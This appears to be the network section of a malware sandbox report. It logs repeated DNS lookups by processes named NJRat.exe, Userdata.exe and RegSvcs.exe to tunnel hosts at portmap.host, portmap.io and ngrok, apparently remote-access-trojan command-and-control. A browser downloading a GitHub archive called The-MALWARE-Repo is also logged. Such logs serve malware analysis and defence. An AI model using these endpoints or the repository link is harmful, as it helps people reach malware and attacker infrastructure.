cxcs.microsoft.net.edgekey.net

IN CNAME

e3230.b.akamaiedge.net

e3230.b.akamaiedge.net

IN A

23.218.72.229
DNS

cxcs.microsoft.net

Remote address:

8.8.8.8:53

Request

cxcs.microsoft.net

IN A
DNS

cxcs.microsoft.net

Remote address:

8.8.8.8:53

Request

cxcs.microsoft.net

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

0.tcp.ngrok.io

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.12.57.198
DNS

0.tcp.ngrok.io

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A
DNS

0.tcp.ngrok.io

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A
DNS

0.tcp.ngrok.io

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nexusrules.officeapps.live.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.243.31
DNS

nexusrules.officeapps.live.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

0.tcp.ngrok.io

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.135.250.11
DNS

0.tcp.ngrok.io

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.135.250.11
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

www.avp.ru

Remote address:

8.8.8.8:53

Request

www.avp.ru

IN A

Response
DNS

www.avp.ru

Remote address:

8.8.8.8:53

Request

www.avp.ru

IN A

Response
DNS

www.avp.ru

Remote address:

8.8.8.8:53

Request

www.avp.ru

IN A

Response
DNS

www.avp.ru

Remote address:

8.8.8.8:53

Request

www.avp.ru

IN A

Response
DNS

google.com

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.238
DNS

google.com

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.238
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

spocs.getpocket.com

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

contile.services.mozilla.com

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN A

Response

contile.services.mozilla.com

IN A

34.117.188.166
DNS

contile.services.mozilla.com

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN AAAA

Response
DNS

firefox-api-proxy.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:c47c::
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:c47c::

20.26.156.215:443

https://github.com/Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip

tls, http2

msedge.exe

6.0kB
100.0kB
66
93

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/security/overall-count

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/hovercards/citation/sidebar_partial?tree_name=master

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/used_by_list

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/latest-commit/master

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/refs?type=branch

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/tree-commit-info/master

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/branch-and-tag-count

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://github.com/manifest.json

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip

HTTP Response

302
51.11.108.188:443

https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

tls, http

msedge.exe

8.8kB
10.8kB
22
16

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

HTTP Response

200
51.11.108.188:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

8.4kB
10.1kB
22
16

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
185.199.111.133:443

https://avatars.githubusercontent.com/u/63458929?s=40&v=4

tls, http2

msedge.exe

3.3kB
20.0kB
34
45

HTTP Request

GET https://avatars.githubusercontent.com/u/63458929?s=64&v=4

HTTP Request

GET https://avatars.githubusercontent.com/u/123590232?s=64&v=4

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://avatars.githubusercontent.com/u/63458929?v=4&size=40

HTTP Response

200

HTTP Request

GET https://avatars.githubusercontent.com/u/123590232?v=4&size=40

HTTP Response

200

HTTP Request

GET https://avatars.githubusercontent.com/u/123590232?v=4&size=32

HTTP Request

GET https://avatars.githubusercontent.com/u/63458929?v=4&size=32

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://avatars.githubusercontent.com/u/63458929?s=40&v=4

HTTP Response

200
185.199.108.154:443

https://github.githubassets.com/assets/diffs-76da528a8b4c.js

tls, http2

msedge.exe

52.8kB
1.5MB
844
1267

HTTP Request

GET https://github.githubassets.com/assets/light-605318cbe3a1.css

HTTP Request

GET https://github.githubassets.com/assets/dark-bd1cb5575fff.css

HTTP Request

GET https://github.githubassets.com/assets/primer-primitives-225433424a87.css

HTTP Request

GET https://github.githubassets.com/assets/primer-93aded0ee8a1.css

HTTP Request

GET https://github.githubassets.com/assets/global-21a7f868f707.css

HTTP Request

GET https://github.githubassets.com/assets/github-18e4a57a83e4.css

HTTP Request

GET https://github.githubassets.com/assets/primer-react.6dfd00213d4192f8a1a4.module.css

HTTP Request

GET https://github.githubassets.com/assets/code-0210be90f4d3.css

HTTP Request

GET https://github.githubassets.com/assets/repository-4fce88777fa8.css

HTTP Request

GET https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

HTTP Request

GET https://github.githubassets.com/assets/repos-overview.0ee7cac3ab511a65d9f9.module.css

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/wp-runtime-fd4fd9da8c67.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-4600dbf2d60a.js

HTTP Request

GET https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-8094ee2ecc5e.js

HTTP Request

GET https://github.githubassets.com/assets/github-elements-e73c59eabd5a.js

HTTP Request

GET https://github.githubassets.com/assets/element-registry-0339e35021ae.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-bc42a18e77d5.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c52.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-768abe60b1f8.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d31a9.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-21948f72ce0b.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-e429cff6ceb1.js

HTTP Request

GET https://github.githubassets.com/assets/behaviors-fcae38dacb59.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js

HTTP Request

GET https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-94dc7a2157c1.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-3e9d848bab5f.js

HTTP Request

GET https://github.githubassets.com/assets/codespaces-c3bcacfe317c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js

HTTP Request

GET https://github.githubassets.com/assets/repositories-7a0dbaa42c57.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js

HTTP Request

GET https://github.githubassets.com/assets/code-menu-1c0aedc134b1.js

HTTP Request

GET https://github.githubassets.com/assets/primer-react-d4f7d0473d87.js

HTTP Request

GET https://github.githubassets.com/assets/react-core-f3d7926d544b.js

HTTP Request

GET https://github.githubassets.com/assets/react-lib-f1bca44e0926.js

HTTP Request

GET https://github.githubassets.com/assets/octicons-react-611691cca2f6.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js

HTTP Request

GET https://github.githubassets.com/assets/notifications-subscriptions-menu-58a0c58bfee4.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-97496b0f52ba.js

HTTP Request

GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-ac448fe050d6.js

HTTP Request

